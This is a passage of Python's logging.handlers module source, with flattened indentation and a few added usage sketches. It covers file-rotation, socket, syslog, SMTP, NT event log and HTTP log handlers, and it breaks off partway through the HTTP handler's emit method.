The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0, encoding=None, delay=False):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
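# A hedged usage sketch for the handler above (illustrative names and paths):
def _example_rotating_logger():
    logger = logging.getLogger('example')
    handler = RotatingFileHandler('app.log', maxBytes=1000000, backupCount=5)
    logger.addHandler(handler)
    # once app.log approaches 1 MB it is renamed to app.log.1 and a fresh
    # app.log is opened; at most five backups are kept
    logger.warning('hello')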
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=None, delay=False, utc=False, atTime=None):
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
# r is the number of seconds left between now and the next rotation
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
self.atTime.second)
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
                # Rotate time is before the current time (for example when
                # self.atTime is 13:45 and it is now 14:15); rotation is
                # tomorrow.
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = currentDay # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
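# A minimal usage sketch for the handler above (the filename is
# hypothetical): rotate at midnight and keep one week of dated backups.
def _example_timed_rotating_usage():
    import logging
    handler = TimedRotatingFileHandler('app.log', when='midnight', backupCount=7)
    logger = logging.getLogger('example.timed')
    logger.addHandler(handler)
    # At rollover the old file is renamed with the suffix computed above,
    # e.g. app.log.2015-01-31, and backups beyond the newest 7 are deleted.
    logger.warning('logged to the current app.log')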
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False):
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def emit(self, record):
"""
Emit a record.
First check if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
                self.stream = None  # See Issue #21742: _open() might fail.
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
logging.FileHandler.emit(self, record)
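# A minimal sketch of pairing the handler above with an external rotator
# such as logrotate (Unix only; the path is hypothetical):
def _example_watched_file_usage():
    import logging
    handler = WatchedFileHandler('/var/log/example/app.log')
    logger = logging.getLogger('example.watched')
    logger.addHandler(handler)
    # If logrotate renames the file between calls, the dev/inode check in
    # emit() notices and transparently reopens the original path.
    logger.warning('safe across external rotations')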
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = (host, port)
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close() # Issue 19182
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except OSError:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
self.sock.sendall(s)
except OSError: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
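# A minimal sketch of the sending side (host and port are hypothetical; the
# port is the module's DEFAULT_TCP_LOGGING_PORT constant). A receiver would
# read the 4-byte ">L" length prefix, unpickle the following bytes, and
# rebuild the record with logging.makeLogRecord:
def _example_socket_handler_usage():
    import logging
    handler = SocketHandler('localhost', DEFAULT_TCP_LOGGING_PORT)
    logger = logging.getLogger('example.socket')
    logger.addHandler(handler)
    logger.warning('pickled and sent over TCP; silently dropped if unreachable')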
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
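# The same sketch over UDP, using the module's DEFAULT_UDP_LOGGING_PORT
# constant; fire-and-forget, so delivery and ordering are not guaranteed:
def _example_datagram_handler_usage():
    import logging
    handler = DatagramHandler('localhost', DEFAULT_UDP_LOGGING_PORT)
    logger = logging.getLogger('example.datagram')
    logger.addHandler(handler)
    logger.warning('sent as a single UDP packet')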
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"security": LOG_AUTH, # DEPRECATED
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = True
self._connect_unixsocket(address)
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_INET, socktype)
if socktype == socket.SOCK_STREAM:
self.socket.connect(address)
self.socktype = socktype
self.formatter = None
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
    def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
self.socket.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change in the future.
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
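# A minimal usage sketch (Unix; assumes a syslog daemon listening on the
# /dev/log socket, and the facility is illustrative):
def _example_syslog_usage():
    import logging
    handler = SysLogHandler(address='/dev/log', facility=SysLogHandler.LOG_DAEMON)
    logger = logging.getLogger('example.syslog')
    logger.addHandler(handler)
    # encodePriority() packs facility and severity into the "<PRI>" prefix:
    # (LOG_DAEMON << 3) | LOG_WARNING == (3 << 3) | 4 == 28, i.e. "<28>".
    logger.warning('hello syslog')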
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
        A timeout in seconds can be specified for the SMTP connection (the
        default is 5.0 seconds).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.utils import formatdate
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = self.format(record)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\nDate: %s\r\n\r\n%s" % (
self.fromaddr,
",".join(self.toaddrs),
self.getSubject(record),
formatdate(), msg)
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
except Exception:
self.handleError(record)
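# A minimal usage sketch (the mailhost, addresses and credentials are all
# hypothetical). Emails are sent synchronously from emit(), so this handler
# is usually reserved for rare, high-severity records:
def _example_smtp_usage():
    import logging
    handler = SMTPHandler(mailhost=('smtp.example.com', 587),
                          fromaddr='app@example.com',
                          toaddrs=['ops@example.com'],
                          subject='Application error',
                          credentials=('user', 'secret'),
                          secure=())  # empty tuple: starttls() with no keyfile
    handler.setLevel(logging.ERROR)
    logging.getLogger('example.smtp').addHandler(handler)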
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None,
context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
if not secure and context is not None:
raise ValueError("context parameter only makes sense "
"with secure=True")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
        that is sent as the CGI data. Override this in a subclass.
Contributed by Franz Glasner.
"""
return record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import http.client, urllib.parse
host = self.host
if self.secure:
h = http.client.HTTPSConnection(host, context=self.context)
else:
h = http.client.HTTPConnection(host)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
                s = ('%s:%s' % self.credentials).encode('utf-8')
                s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
